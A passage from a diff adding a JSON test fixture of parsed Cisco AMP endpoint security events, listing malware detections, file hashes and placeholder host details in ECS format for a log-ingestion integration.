+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-15T10:24:58.000Z",
+                "action": "Multiple Infected Files",
+                "id": "1489955900329000200",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.3372C1EDAB-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 1107296258
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:23:01.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "\\\\?\\C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469640203Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533670191031648000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533670191031648309",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:23:01.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469642099Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533670191031648000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533670191031648308",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:23:01.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469643984Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533670191031648000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533670191031648307",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"
+                }
+            },
+            "@timestamp": "2021-01-15T10:22:29.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "file:///C%3A/ekjrngjker.exe",
+                "hash": {
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:04.469646010Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-15T10:22:29.000Z",
+                "action": "Executed malware",
+                "id": "15212386047828",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.B1380FD95B-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 1107296272
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:22:00.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "\\\\?\\C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469647897Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533669929038643000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533669929038643250",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:22:00.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469649781Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533669929038643000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533669929038643249",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:22:00.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469651657Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533669929038643000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533669929038643248",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:21:00.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "\\\\?\\C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
